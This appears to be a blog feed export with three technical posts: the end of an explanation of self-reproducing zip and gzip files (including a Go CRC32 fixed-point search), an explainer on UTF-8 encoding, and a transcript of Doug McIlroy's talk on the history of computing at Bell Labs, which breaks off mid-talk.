<td><code>R4 L0 L0 L</code><span style="font-size: 0.8em;"><i>s</i>+1</span><code></code></td>
</tr>
<tr>
<td align=right><i><span style="font-size: 0.8em;">no-op</span></i></td>
<td></td>
<td><code>L0</code></td>
<td></td>
<td></td>
</tr>
<tr>
<td align=right><i><span style="font-size: 0.8em;">no-op</span></i></td>
<td></td>
<td><code>L0</code></td>
<td></td>
<td></td>
</tr>
<tr>
<td align=right><span style="font-size: 0.8em;"><i>print </i>s<i>+1 bytes</i></span></td>
<td></td>
<td><code>L</code><span style="font-size: 0.8em;"><i>s</i>+1</span><code> <span style="color: #005500">R</span></code><span style="color: #005500"><span style="font-size: 0.8em;"><i>s</i>+1</span></span><code><span style="color: #005500"> [S]</span></code></td>
<td></td>
<td><code>R</code><span style="font-size: 0.8em;"><i>s</i>+1</span><code> [S]</code></td>
</tr>
<tr>
<td align=right><span style="font-size: 0.8em;"><i>repeat last </i>s<i>+1 bytes</i></span></td>
<td></td>
<td><code>R</code><span style="font-size: 0.8em;"><i>s</i>+1</span><code></code></td>
<td></td>
<td><code>R</code><span style="font-size: 0.8em;"><i>s</i>+1</span><code> [S]</code></td>
</tr>
<tr>
<td align=right><i><span style="font-size: 0.8em;">print suffix</span></i></td>
<td></td>
<td><code>[S]</code></td>
<td></td>
<td><code>S</code></td>
</tr>
</table>
</center>
<br>
<p class=lp>
(The byte sequence in the Output column is <code><i>P</i></code>, then
the byte sequence from the Code column, then <code><i>S</i></code>.)
</p>
<h3>Self-reproducing zip files</h3>
<p class=pp>
Now the rubber meets the road.
We've solved the main theoretical obstacle to making a self-reproducing
zip file, but there are a couple practical obstacles
still in our way.
</p>
<p class=pp>
The first obstacle is to translate our self-reproducing Lempel-Ziv program,
written in simplified opcodes, into the real opcode encoding.
<a href="http://www.ietf.org/rfc/rfc1951.txt">RFC 1951</a> describes the DEFLATE format used in both gzip and zip: a sequence of blocks, each of which
is a sequence of opcodes encoded using Huffman codes.
Huffman codes assign different length bit strings
to different opcodes,
breaking our assumption above that opcodes have
fixed length.
But wait!
We can, with some care, find a set of fixed-size encodings
that says what we need to be able to express.
</p>
<p class=pp>
In DEFLATE, there are literal blocks and opcode blocks.
The header at the beginning of a literal block is 5 bytes:
</p>
<center>
<img src="https://research.swtch.com/zip1.png">
</center>
<p class=pp>
If the translations of our <code>L</code> opcodes above
are 5 bytes each, the translations of the <code>R</code> opcodes
must also be 5 bytes each, with all the byte counts
above scaled by a factor of 5.
(For example, <code>L4</code> now has a 20-byte argument,
and <code>R4</code> repeats the last 20 bytes of output.)
The opcode block
with a single <code>repeat(20,20)</code> instruction falls well short of
5 bytes:
</p>
<center>
<img src="https://research.swtch.com/zip2.png">
</center>
<p class=lp>Luckily, an opcode block containing two
<code>repeat(20,10)</code> instructions has the same effect and is exactly 5 bytes:
</p>
<center>
<img src="https://research.swtch.com/zip3.png">
</center>
<p class=lp>
Encoding the other sized repeats
(<code>R</code><span style="font-size: 0.8em;"><i>p</i>+1</span> and
<code>R</code><span style="font-size: 0.8em;"><i>s</i>+1</span>)
takes more effort
and some sleazy tricks, but it turns out that
we can design 5-byte codes that repeat any amount
from 9 to 64 bytes.
For example, here are the repeat blocks for 10 bytes and for 40 bytes:
</p>
<center>
<img src="https://research.swtch.com/zip4.png">
<br>
<img src="https://research.swtch.com/zip5.png">
</center>
<p class=lp>
The repeat block for 10 bytes is two bits too short,
but every repeat block is followed by a literal block,
which starts with three zero bits and then padding
to the next byte boundary.
If a repeat block ends two bits short of a byte
but is followed by a literal block, the literal block's
padding will insert the extra two bits.
Similarly, the repeat block for 40 bytes is five bits too long,
but they're all zero bits.
Starting a literal block five bits too late
steals the bits from the padding.
Both of these tricks only work because the last 7 bits of
any repeat block are zero and the bits in the first byte
of any literal block are also zero,
so the boundary isn't directly visible.
If the literal block started with a one bit,
this sleazy trick wouldn't work.
</p>
<p class=pp>The second obstacle is that zip archives (and gzip files)
record a CRC32 checksum of the uncompressed data.
Since the uncompressed data is the zip archive,
the data being checksummed includes the checksum itself.
So we need to find a value <i>x</i> such that writing <i>x</i> into
the checksum field causes the file to checksum to <i>x</i>.
Recursion strikes back.
</p>
<p class=pp>
The CRC32 checksum computation interprets the entire file as a big number and computes
the remainder when you divide that number by a specific constant
using a specific kind of division.
We could go through the effort of setting up the appropriate
equations and solving for <i>x</i>.
But frankly, we've already solved one nasty recursive puzzle
today, and <a href="http://www.youtube.com/watch?v=TQBLTB5f3j0">enough is enough</a>.
There are only four billion possibilities for <i>x</i>:
we can write a program to try each in turn, until it finds one that works.
</p>
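<p class=pp>
Here is a rough Go sketch of that brute force. The function and the file
layout assumed in <code>main</code> are my own placeholders; in the real
archive the uncompressed data is the file itself and the checksum value
appears at more than one offset, so every copy must be patched together:
</p>
<pre class=indent>
package main

import (
	"encoding/binary"
	"fmt"
	"hash/crc32"
	"os"
)

// findCRC searches for a value x such that storing x (little-endian,
// the byte order zip and gzip use) at each of the given offsets in buf
// makes the CRC32 of buf equal to x: plain brute force over all 2^32
// candidates. The offsets are wherever the checksum field appears.
func findCRC(buf []byte, offsets []int) (uint32, bool) {
	for x := uint32(0); ; x++ {
		for _, off := range offsets {
			binary.LittleEndian.PutUint32(buf[off:], x)
		}
		if crc32.ChecksumIEEE(buf) == x {
			return x, true
		}
		if x == 1<<32-1 {
			return 0, false
		}
	}
}

func main() {
	// Usage sketch: patch the file named on the command line, assuming
	// (hypothetically) that its checksum field is the last four bytes.
	buf, err := os.ReadFile(os.Args[1])
	if err != nil {
		panic(err)
	}
	if x, ok := findCRC(buf, []int{len(buf) - 4}); ok {
		fmt.Printf("fixed point: %08x\n", x)
	} else {
		fmt.Println("no fixed point found")
	}
}
</pre>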
<p class=pp>
If you want to recreate these files yourself, there are a
few more minor obstacles, like making sure the tar file is a multiple
of 512 bytes and compressing the rather large zip trailer to
at most 59 bytes so that <code>R</code><span style="font-size: 0.8em;"><i>s</i>+1</span> is
at most <code>R</code><span style="font-size: 0.8em;">64</span>.
But they're just a simple matter of programming.
</p>
<p class=pp>
So there you have it:
<code><a href="http://swtch.com/r.gz">r.gz</a></code> (gzip files all the way down),
<code><a href="http://swtch.com/r.tar.gz">r.tar.gz</a></code> (gzipped tar files all the way down),
and
<code><a href="http://swtch.com/r.zip">r.zip</a></code> (zip files all the way down).
I regret that I have been unable to find any programs
that insist on decompressing these files recursively, ad infinitum.
It would have been fun to watch them squirm, but
it looks like much less sophisticated
<a href="http://en.wikipedia.org/wiki/Zip_bomb">zip bombs</a> have spoiled the fun.
</p>
<p class=pp>
If you're feeling particularly ambitious, here is
<a href="http://swtch.com/rgzip.go">rgzip.go</a>,
the <a href="http://golang.org/">Go</a> program that generated these files.
I wonder if you can create a zip file that contains a gzipped tar file
that contains the original zip file.
Ken Thompson suggested trying to make a zip file that
contains a slightly larger copy of itself, recursively,
so that as you dive down the chain of zip files
each one gets a little bigger.
(If you do manage either of these, please leave a comment.)
</p>
<br>
<p class=lp><font size=-1>P.S. I can't end the post without sharing my favorite self-reproducing program: the one-line shell script <code>#!/bin/cat</code></font>.
</p></p>
</div>
</div>
</div>
UTF-8: Bits, Bytes, and Benefitstag:research.swtch.com,2012:research.swtch.com/utf82010-03-05T00:00:00-05:002010-03-05T00:00:00-05:00The reasons to switch to UTF-8
<p><p class=pp>
UTF-8 is a way to encode Unicode code points—integer values from
0 through 10FFFF—into a byte stream,
and it is far simpler than many people realize.
The easiest way to make it confusing or complicated
is to treat it as a black box, never looking inside.
So let's start by looking inside. Here it is:
</p>
<center>
<table cellspacing=5 cellpadding=0 border=0>
<tr height=10><th colspan=4></th></tr>
<tr><th align=center colspan=2>Unicode code points</th><th width=10><th align=center>UTF-8 encoding (binary)</th></tr>
<tr height=10><td colspan=4></td></tr>
<tr><td align=right>00-7F</td><td>(7 bits)</td><td></td><td align=right>0<i>tuvwxyz</i></td></tr>
<tr><td align=right>0080-07FF</td><td>(11 bits)</td><td></td><td align=right>110<i>pqrst</i> 10<i>uvwxyz</i></td></tr>
<tr><td align=right>0800-FFFF</td><td>(16 bits)</td><td></td><td align=right>1110<i>jklm</i> 10<i>npqrst</i> 10<i>uvwxyz</i></td></tr>
<tr><td align=right valign=top>010000-10FFFF</td><td>(21 bits)</td><td></td><td align=right valign=top>11110<i>efg</i> 10<i>hijklm</i> 10<i>npqrst</i> 10<i>uvwxyz</i></td>
<tr height=10><td colspan=4></td></tr>
</table>
</center>
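<p class=lp>
To make the table concrete, here is a hand-rolled Go sketch of an encoder
following it; real programs should use the standard <code>unicode/utf8</code>
package, and this sketch skips validity checks (surrogates, out-of-range
values). The function name is mine:
</p>
<pre class=indent>
// encodeRune returns the UTF-8 encoding of the code point r,
// following the table above row by row.
func encodeRune(r rune) []byte {
	switch {
	case r < 0x80:
		return []byte{byte(r)}
	case r < 0x800:
		return []byte{0xC0 | byte(r>>6), 0x80 | byte(r)&0x3F}
	case r < 0x10000:
		return []byte{0xE0 | byte(r>>12), 0x80 | byte(r>>6)&0x3F, 0x80 | byte(r)&0x3F}
	default: // up to 10FFFF
		return []byte{0xF0 | byte(r>>18), 0x80 | byte(r>>12)&0x3F, 0x80 | byte(r>>6)&0x3F, 0x80 | byte(r)&0x3F}
	}
}
</pre>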
<p class=lp>
The convenient properties of UTF-8 are all consequences of the choice of encoding.
</p>
<ol>
<li><i>All ASCII files are already UTF-8 files.</i><br>
The first 128 Unicode code points are the 7-bit ASCII character set,
and UTF-8 preserves their one-byte encoding.
</li>
<li><i>ASCII bytes always represent themselves in UTF-8 files. They never appear as part of other UTF-8 sequences.</i><br>
All the non-ASCII UTF-8 sequences consist of bytes
with the high bit set, so if you see the byte 0x7A in a UTF-8 file,
you can be sure it represents the character <code>z</code>.
</li>
<li><i>ASCII bytes are always represented as themselves in UTF-8 files. They cannot be hidden inside multibyte UTF-8 sequences.</i><br>
The ASCII <code>z</code> 01111010 cannot be encoded as a two-byte UTF-8 sequence
11000001 10111010. Code points must be encoded using the shortest
possible sequence.
A corollary is that decoders must detect long-winded sequences as invalid.
In practice, it is useful for a decoder to use the Unicode replacement
character, code point FFFD, as the decoding of an invalid UTF-8 sequence
rather than stop processing the text.
</li>
<li><i>UTF-8 is self-synchronizing.</i><br>
Let's call a byte of the form 10<i>xxxxxx</i>
a continuation byte.
Every UTF-8 sequence is a byte that is not a continuation byte
followed by zero or more continuation bytes.
If you start processing a UTF-8 file at an arbitrary point,
you might not be at the beginning of a UTF-8 encoding,
but you can easily find one: skip over
continuation bytes until you find a non-continuation byte.
(The same applies to scanning backward.)
</li>
<li><i>Substring search is just byte string search.</i><br>
Properties 2, 3, and 4 imply that given a string
of correctly encoded UTF-8, the only way those bytes
can appear in a larger UTF-8 text is when they represent the
same code points. So you can use any 8-bit-safe, byte-at-a-time
search function, like <code>strchr</code> or <code>strstr</code>, to run the search.
</li>
<li><i>Most programs that handle 8-bit files safely can handle UTF-8 safely.</i><br>
This also follows from Properties 2, 3, and 4.
I say “most” programs, because programs that
take apart a byte sequence expecting one character per byte
will not behave correctly, but very few programs do that.
It is far more common to split input at newline characters,
or split whitespace-separated fields, or do other similar parsing
around specific ASCII characters.
For example, Unix tools like cat, cmp, cp, diff, echo, head, tail, and tee
can process UTF-8 files as if they were plain ASCII files.
Most operating system kernels should also be able to handle
UTF-8 file names without any special arrangement, since the
only operations done on file names are comparisons
and splitting at <code>/</code>.
In contrast, tools like grep, sed, and wc, which inspect arbitrary
individual characters, do need modification.
</li>
<li><i>UTF-8 sequences sort in code point order.</i><br>
You can verify this by inspecting the encodings in the table above.
This means that Unix tools like join, ls, and sort (without options) don't need to handle
UTF-8 specially.
</li>
<li><i>UTF-8 has no “byte order.”</i><br>
UTF-8 is a byte encoding. It is not little endian or big endian.
Unicode defines a byte order mark (BOM) code point FEFF,
which is used to determine the byte order of a stream of
raw 16-bit values, like UCS-2 or UTF-16.
It has no place in a UTF-8 file.
Some programs like to write a UTF-8-encoded BOM
at the beginning of UTF-8 files, but this is unnecessary
(and annoying to programs that don't expect it).
</li>
</ol>
<p class=lp>
UTF-8 does give up the ability to do random
access using code point indices.
Programs that need to jump to the <i>n</i>th
Unicode code point in a file or on a line—text editors are the canonical example—will
typically convert incoming UTF-8 to an internal representation
like an array of code points and then convert back to UTF-8
for output,
but most programs are simpler when written to manipulate UTF-8 directly.
</p>
<p class=pp>
Programs that make UTF-8 more complicated than it needs to be
are typically trying to be too general,
not wanting to make assumptions that might not be true of
other encodings.
But there are good tools to convert other encodings to UTF-8,
and it is slowly becoming the standard encoding:
even the fraction of web pages
written in UTF-8 is
<a href="http://googleblog.blogspot.com/2010/01/unicode-nearing-50-of-web.html">nearing 50%</a>.
UTF-8 was explicitly designed
to have these nice properties. Take advantage of them.
</p>
<p class=pp>
For more on UTF-8, see “<a href="https://9p.io/sys/doc/utf.html">Hello World
or
Καλημέρα κόσμε
or
こんにちは 世界</a>,” by Rob Pike
and Ken Thompson, and also this <a href="http://www.cl.cam.ac.uk/~mgk25/ucs/utf-8-history.txt">history</a>.
</p>
<br>
<font size=-1>
<p class=lp>
Notes: Property 6 assumes the tools do not strip the high bit from each byte.
Such mangling was common years ago but is very uncommon now.
Property 7 assumes the comparison is done treating
the bytes as unsigned, but such behavior is mandated
by the ANSI C standard for <code>memcmp</code>,
<code>strcmp</code>, and <code>strncmp</code>.
</p>
</font></p>
Computing History at Bell Labstag:research.swtch.com,2012:research.swtch.com/bell-labs2008-04-09T00:00:00-04:002008-04-09T00:00:00-04:00Doug McIlroy’s remembrances
<p><p class=pp>
In 1997, on his retirement from Bell Labs, <a href="http://www.cs.dartmouth.edu/~doug/">Doug McIlroy</a> gave a
fascinating talk about the “<a href="https://web.archive.org/web/20081022192943/http://cm.bell-labs.com/cm/cs/doug97.html"><b>History of Computing at Bell Labs</b></a>.”
Almost ten years ago I transcribed the audio but never did anything with it.
The transcript is below.
</p>
<p class=pp>
My favorite parts of the talk are the description of the bi-quinary decimal relay calculator
and the description of a team that spent over a year tracking down a race condition bug in
a missile detector (reliability was king: today you’d just stamp
“cannot reproduce” and send the report back).
But the whole thing contains many fantastic stories.
It’s well worth the read or listen.
I also like his recollection of programming using cards: “It’s the kind of thing you can be nostalgic about, but it wasn’t actually fun.”
</p>
<p class=pp>
For more information, Bernard D. Holbrook and W. Stanley Brown’s 1982
technical report
“<a href="cstr99.pdf">A History of Computing Research at Bell Laboratories (1937-1975)</a>”
covers the earlier history in more detail.
</p>
<p><i>Corrections added August 19, 2009. Links updated May 16, 2018.</i></p>
<p><i>Update, December 19, 2020.</i> The original audio files disappeared along with the rest of the Bell Labs site some time ago, but I discovered a saved copy on one of my computers: [<a href="mcilroy97history.mp3">MP3</a> | <a href="mcilroy97history.rm">original RealAudio</a>].
I also added a few corrections and notes from Doug McIlroy, dated 2015 [sic].</p>
<br>
<br>
<p class=lp><b>Transcript</b></p>
<p class=pp>
Computing at Bell Labs is certainly an outgrowth of the
<a href="https://web.archive.org/web/20080622172015/http://cm.bell-labs.com/cm/ms/history/history.html">mathematics department</a>, which grew from that first hiring
in 1897, G A Campbell. When Bell Labs was formally founded
in 1925, what it had been was the engineering department
of Western Electric.
When it was formally founded in 1925,
almost from the beginning there was a math department with Thornton Fry as the department head, and if you look at some of Fry’s work, it turns out that
he was fussing around in 1929 with trying to discover
information theory. It didn’t actually gel until twenty years later with Shannon.</p>
<p class=pp><span style="font-size: 0.7em;">1:10</span>
Of course, most of the mathematics at that time was continuous.
One was interested in analyzing circuits and propagation. And indeed, this is what led to the growth of computing in Bell Laboratories. The computations could not all be done symbolically. There were not closed form solutions. There was lots of numerical computation done.
The math department had a fair stable of computers,
which in those days meant people. [laughter]</p>
<p class=pp><span style="font-size: 0.7em;">2:00</span>
And in the late ’30s, <a href="http://en.wikipedia.org/wiki/George_Stibitz">George Stibitz</a> had an idea that some of
the work that they were doing on hand calculators might be
automated by using some of the equipment that the Bell System
was installing in central offices, namely relay circuits.
He went home, and on his kitchen table, he built out of relays
a binary arithmetic circuit. He decided that binary was really
the right way to compute.
However, when he finally came to build some equipment,
he determined that binary to decimal conversion and
decimal to binary conversion was a drag, and he didn’t
want to put it in the equipment, and so he finally built
in 1939, a relay calculator that worked in decimal,
and it worked in complex arithmetic.
Do you have a hand calculator now that does complex arithmetic?
Ten-digit, I believe, complex computations: add, subtract,
multiply, and divide.
The I/O equipment was teletypes, so essentially all the stuff to make such
machines out of was there.
Since the I/O was teletypes, it could be remotely accessed,
and there were in fact four stations in the West Street Laboratories
of Bell Labs. West Street is down on the left side of Manhattan.
I had the good fortune to work there one summer, right next to a
district where you’re likely to get bowled over by rolling beeves hanging from racks or tumbling cabbages. The building is still there. It’s called <a href="http://query.nytimes.com/gst/fullpage.html?res=950DE3DB1F38F931A35751C0A96F948260">Westbeth Apartments</a>. It’s now an artist’s colony.</p>
<p class=pp><span style="font-size: 0.7em;">4:29</span>
Anyway, in West Street, there were four separate remote stations from which the complex calculator could be accessed. It was not time sharing. You actually reserved your time on the machine, and only one of the four terminals worked at a time.
In 1940, this machine was shown off to the world at the AMS annual convention, which happened to be held in Hanover at Dartmouth that year, and mathematicians could wonder at remote computing, doing computation on an electromechanical calculator at 300 miles away.</p>
<p class=pp><span style="font-size: 0.7em;">5:22</span>
Stibitz went on from there to make a whole series of relay machines. Many of them were made for the government during the war. They were named, imaginatively, Mark I through Mark VI.
I have read some of his patents. They’re kind of fun. One is a patent on conditional transfer. [laughter] And how do you do a conditional transfer?
Well these gadgets were, the relay calculator was run from your fingers, I mean the complex calculator.
The later calculators, of course, if your fingers were a teletype, you could perfectly well feed a paper tape in,
because that was standard practice. And these later machines were intended really to be run more from paper tape.
And the conditional transfer was this: you had two teletypes, and there’s a code that says "time to read from the other teletype". Loops were of course easy to do. You take paper and [laughter; presumably Doug curled a piece of paper to form a physical loop].
These machines never got to the point of having stored programs.
But they got quite big. I saw, one of them was here in 1954, and I did see it, behind glass, and if you’ve ever seen these machines in the, there’s one in the Franklin Institute in Philadelphia, and there’s one in the Science Museum in San Jose, you know these machines that drop balls that go wandering sliding around and turning battle wheels and ringing bells and who knows what. It kind of looked like that.
It was a very quiet room, with just a little clicking of relays, which is what a central office used to be like. It was the one air-conditioned room in Murray Hill, I think. This machine ran, the Mark VI, well I think that was the Mark V, the Mark VI actually went to Aberdeen.
This machine ran for a good number of years, probably six, eight.
And it is said that it never made an undetected error. [laughter]</p>
<p class=pp><span style="font-size: 0.7em;">8:30</span>
What that means is that it never made an error that it did not diagnose itself and stop.
Relay technology was very very defensive. The telephone switching system had to work. It was full of self-checking,
and so were the calculators, so were the calculators that Stibitz made.</p>
<p class=pp><span style="font-size: 0.7em;">9:04</span>
Arithmetic was done in bi-quinary, a two out of five representation for decimal integers, and if there weren’t exactly two out of five relays activated it would stop.
This machine ran unattended over the weekends. People would
bring their tapes in, and the operator would paste everybody’s tapes together.
There was a beginning of job code on the tape and there was also a time indicator.
If the machine ran out of time, it automatically stopped and went to the next job. If the machine caught itself in an error, it backed up to the current job and tried it again.
They would load this machine on Friday night, and on Monday morning, all the tapes, all the entries would be available on output tapes.</p>
<p class=pp>Question: I take it they were using a different representation for loops
and conditionals by then.</p>
<p class=pp>Doug: Loops were done actually by they would run back and forth across the tape now, on this machine.</p>
<p class=pp><span style="font-size: 0.7em;">10:40</span>
Then came the transistor in ’48.
At Whippany, they actually had a transistorized computer, which was a respectable minicomputer, a box about this big, running in 1954, it ran from 1954 to 1956 solidly as a test run.
The notion was that this computer might fly in an airplane.
And during that two-year test run, one diode failed.
In 1957, this machine called <a href="http://www.cedmagic.com/history/tradic-transistorized.html">TRADIC</a>, did in fact fly in an airplane, but to the best of my knowledge, that machine was a demonstration machine. It didn’t turn into a production machine.
About that time, we started buying commercial machines.
It’s wonderful to think about the set of different architectures that existed in that time. The first machine we got was called a <a href="http://www.columbia.edu/acis/history/cpc.html">CPC from IBM</a>. And all it was was a big accounting machine with a very special plugboard on the side that provided an interpreter for doing ten-digit decimal arithmetic, including
opcodes for the trig functions and square root.</p>
<p class=pp><span style="font-size: 0.7em;">12:30</span>
It was also not a computer as we know it today,
because it wasn’t stored program, it had twenty-four memory locations as I recall, and it took its program instead of from tapes, from cards. This was not a total advantage. A tape didn’t get into trouble if you dropped it on the floor. [laughter].
CPC, the operator would stand in front of it, and there, you
would go through loops by taking cards out, it took human intervention, to take the cards out of the output of the card reader and put them in the ?top?. I actually ran some programs on the CPC ?...?. It’s the kind of thing you can be nostalgic about, but it wasn’t actually fun.
[laughter]</p>
<p class=pp><span style="font-size: 0.7em;">13:30</span>
The next machine was an <a href="http://www.columbia.edu/acis/history/650.html">IBM 650</a>, and here, this was a stored program, with the memory being on drum. There was no operating system for it. It came with a manual: this is what the machine does. And Michael Wolontis made an interpreter called the <a href="http://hopl.info/showlanguage2.prx?exp=6497">L1 interpreter</a> for this machine, so you could actually program in, the manual told you how to program in binary, and L1 allowed you to give something like 10 for add and 9 for subtract, and program in decimal instead. And of course that machine required interesting optimization, because it was a nice thing if the next program step were stored somewhere -- each program step had the address of the following step in it, and you would try to locate them around the drum so as to minimize latency. So there were all kinds of optimizers around, but I don’t think Bell Labs made ?...? based on this called “SOAP” from Carnegie Mellon. That machine didn’t last very long. Fortunately, a machine with core memory came out from IBM in about ’56, the 704. Bell Labs was a little slow in getting one, in ’58. Again, the machine came without an operating system.
In fact, but it did have Fortran, which really changed the world.
It suddenly made it easy to write programs. But the way Fortran came from IBM, it came with a thing called the Fortran Stop Book.
This was a list of what happened, a diagnostic would execute the halt instruction, the operator would go read the panel lights and discover where the machine had stopped, you would then go look up in the stop book what that meant.
Bell Labs, with George Mealy and Gwen Hanson, made an operating system, and one of the things they did was to bring the stop book to heel. They took the compiler, replaced all the stop instructions with jumps to somewhere, and allowed the program instead of stopping to go on to the next trial.
By the time I arrived at Bell Labs in 1958, this thing was running nicely.</p>
<p class=pp>[<i>McIlroy comments, 2015</i>: I’m pretty sure I was wrong in saying Mealy and Hanson brought
the stop book to heel. They built the OS, but I believe Dolores
Leagus tamed Fortran. (Dolores was the most accurate programmer I
ever knew. She’d write 2000 lines of code before testing a single
line--and it would work.)]</p>
<p class=pp><span style="font-size: 0.7em;">16:36</span>
Bell Labs continued to be a major player in operating systems.
This was called BESYS. BE was the SHARE abbreviation for Bell Labs. Each company that belonged to SHARE, which was the IBM users group, had a two-letter abbreviation. It’s hard to imagine taking all the computer users now and giving them a two-letter abbreviation. BESYS went through many generations, up to BESYS 5, I believe. Each one with innovations. IBM delivered a machine, the 7090, in 1960. This machine had interrupts in it, but IBM didn’t use them. But BESYS did. And that sent IBM back to the drawing board to make it work. [Laughter]</p>
<p class=pp><span style="font-size: 0.7em;">17:48</span>
Rob Pike: It also didn’t have memory protection.</p>
<p class=pp>Doug: It didn’t have memory protection either, and a lot of people actually got IBM to put memory protection in the 7090, so that one could leave the operating system resident in the presence of a wild program, an idea that the PC didn’t discover until, last year or something like that. [laughter]</p>
<p class=pp>Big players then, <a href="http://en.wikipedia.org/wiki/Richard_Hamming">Dick Hamming</a>, a name that I’m sure everybody knows,
was sort of the numerical analysis guru, and a seer.
He liked to make outrageous predictions. He predicted in 1960, that half of Bell Labs was going to be busy doing something with computers eventually.
?...? exaggerating some ?...? abstract in his thought.
He was wrong.
Half was a gross underestimate. Dick Hamming retired twenty years ago, and just this June he completed his full twenty-year term in the Navy, which entitles him again to retire from the Naval Postgraduate Institute in Monterey. Stibitz, incidentally, died, I think, within the last year.
He was doing medical instrumentation at Dartmouth essentially, near the end.</p>
<p class=pp>[<i>McIlroy comments, 2015</i>: I’m not sure what exact unintelligible words I uttered about Dick
Hamming. When he predicted that half the Bell Labs budget would
be related to computing in a decade, people scoffed in terms like
“that’s just Dick being himself, exaggerating for effect”.]</p>
<p class=pp><span style="font-size: 0.7em;">20:00</span>
Various problems intrigued us, besides the numerical problems, which in fact were stock in trade, and were the real justification for buying machines, until at least the ’70s I would say. But some non-numerical problems had begun to tickle the palate of the math department. Even G A Campbell got interested in graph theory, the reason being he wanted to think of all the possible ways you could take the three wires and the various parts of the telephone and connect them together, and try permutations to see what you could do about reducing sidetone by putting things into the various parts of the circuit, and devised every possible way of connecting the telephone up. And that was sort of the beginning of combinatorics at Bell Labs. John Reardon, a mathematician, parlayed this into a major subject. Two problems, which are now deemed computing problems, have intrigued the math department for a very long time, and those are the minimum spanning tree problem, and the wonderfully ?comment about Joe Kruskal, laughter?</p>
<p class=pp><span style="font-size: 0.7em;">21:50</span>
And in the 50s Bob Prim and Kruskal, who I don’t think worked on the Labs at that point, invented algorithms for the minimum spanning tree. Somehow or other, computer scientists usually learn these algorithms, one of the two at least, as Dijkstra’s algorithm, but he was a latecomer.</p>
<p class=pp>[<i>McIlroy comments, 2015</i>:
I erred in attributing Dijkstra’s algorithm to Prim and Kruskal. That
honor belongs to yet a third member of the math department: Ed
Moore. (Dijkstra’s algorithm is for shortest path, not spanning
tree.)]</p>
<p class=pp>Another pet was the traveling salesman. There’s been a long list of people at Bell Labs who played with that: Shen Lin and Ron Graham and David Johnson and dozens more, oh and ?...?. And then another problem is the Steiner minimum spanning tree, where you’re allowed to add points to the graph. Every one of these problems grew, actually had a justification in telephone billing. One jurisdiction or another would specify that the way you bill for a private line network was in one jurisdiction by the minimum spanning tree. In another jurisdiction, by the traveling salesman route. NP-completeness wasn’t a word in the vocabulary of lawmakers [laughter]. And the <a href="http://en.wikipedia.org/wiki/Steiner_tree">Steiner problem</a> came up because customers discovered they could beat the system by inventing offices in the middle of Tennessee that had nothing to do with their business, but they could put the office at a Steiner point and reduce their phone bill by adding to the service that the Bell System had to give them. So all of these problems actually had some justification in billing besides the fun.</p>
<p class=pp><span style="font-size: 0.7em;">24:15</span>
Come the 60s, we actually started to hire people for computing per se. I was perhaps the third person who was hired with a Ph.D. to help take care of the computers and I’m told that the then director and head of the math department, Hendrick Bode, had said to his people, "yeah, you can hire this guy, instead of a real mathematician, but what’s he gonna be doing in five years?" [laughter]</p>
<p class=pp><span style="font-size: 0.7em;">25:02</span>
Nevertheless, we started hiring for real in about ’67. Computer science got split off from the math department. I had the good fortune to move into the office that I’ve been in ever since then. Computing began to make, get a personality of its own. One of the interesting people that came to Bell Labs for a while was Hao Wang. Is his name well known? [Pause] One nod. Hao Wang was a philosopher and logician, and we got a letter from him in England out of the blue saying "hey you know, can I come and use your computers? I have an idea about theorem proving." There was theorem proving in the air in the late 50s, and it was mostly pretty thin stuff. It was obvious that the methods being proposed wouldn’t possibly do anything more difficult than solve tic-tac-toe problems by enumeration. Wang had a notion that he could mechanically prove theorems in the style of Whitehead and Russell’s great treatise Principia Mathematica in the early part of the century. He came here, learned how to program in machine language, and took all of Volume I of Principia Mathematica --
if you’ve ever hefted Principia, well that’s about all it’s good for, it’s a real good door stop. It’s really big. But it’s theorem after theorem after theorem in propositional calculus. Of course, there’s a decision procedure for propositional calculus, but he was proving them more in the style of Whitehead and Russell. And when he finally got them all coded and put them into the computer, he proved the entire contents of this immense book in eight minutes.
This was actually a neat accomplishment. Also that was the beginning of all the language theory. We hired people like <a href="http://www1.cs.columbia.edu/~aho/">Al Aho</a> and <a href="http://infolab.stanford.edu/~ullman/">Jeff Ullman</a>, who probed around every possible model of grammars and syntax, and all of the things that are now in the standard undergraduate curriculum -- syntax and finite state machines and so on -- were pretty well nailed down here in the 60s. Speaking of finite state machines, in the 50s, both Mealy and Moore, who have two of the well-known models of finite state machines, were here.</p>
<p class=pp><span style="font-size: 0.7em;">28:40</span>
During the 60s, we undertook an enormous development project in the guise of research, which was <a href="http://www.multicians.org/">MULTICS</a>, and the notion of MULTICS was that computing was the public utility of the future. Machines were very expensive, and ?indeed? like you don’t own your own electric generator, you rely on the power company to do generation for you, and it was seen that this was a good way to do computing -- time sharing -- and it was also recognized that shared data was a very good thing. MIT pioneered this and Bell Labs joined in on the MULTICS project, and this occupied five years of system programming effort, until Bell Labs pulled out, because it turned out that MULTICS was too ambitious for the hardware at the time, and also with 80 people on it was not exactly a research project. But, that led to various people who were on the project, in particular <a href="http://en.wikipedia.org/wiki/Ken_Thompson">Ken Thompson</a> -- right there -- to think about how to -- <a href="http://en.wikipedia.org/wiki/Dennis_Ritchie">Dennis Ritchie</a> and Rudd Canaday were in on this too -- to think about how you might make a pleasant operating system with a little less resources.</p>
<p class=pp><span style="font-size: 0.7em;">30:30</span>
And Ken found -- this is a story that’s often been told, so I won’t go into very much of unix -- Ken found an old machine cast off in the corner, the <a href="http://en.wikipedia.org/wiki/PDP-7">PDP-7</a>, and put up this little operating system on it, and we had an immense <a href="http://en.wikipedia.org/wiki/GE-600_series">GE635</a> available at the comp center at the time, and I remember as the department head, muscling in to use this little computer to be, to get to be Unix’s first user, customer, because it was so much pleasanter to use this tiny machine than it was to use the big and capable machine in the comp center. And of course the rest of the story is known to everybody and has affected all college campuses in the country.</p>
<p class=pp><span style="font-size: 0.7em;">31:33</span>
Along with the operating system work, there was a fair amount of language work done at Bell Labs. Often curious off-beat languages. One of my favorites was called <a href="http://hopl.murdoch.edu.au/showlanguage.prx?exp=6937&language=BLODI-B">Blodi</a>, B L O D I, a block diagram compiler by Kelly and Vyssotsky. Perhaps the most interesting early uses of computers, in the sense of being unexpected, were those that came from the acoustics research department, and the Blodi compiler was invented in the acoustics research department for doing digital simulations of sample data systems. DSPs are classic sample data systems,
where instead of passing analog signals around, you pass around streams of numerical values. And Blodi allowed you to say here’s a delay unit, here’s an amplifier, here’s an adder, the standard piece parts for a sample data system, and each one was described on a card, with a description of what it’s wired to. It was then compiled into one enormous single straight-line loop for one time step. Of course, you had to rearrange the code, because one part of the sample data system would feed another, and it produced really very efficient 7090 code for simulating sample data systems.
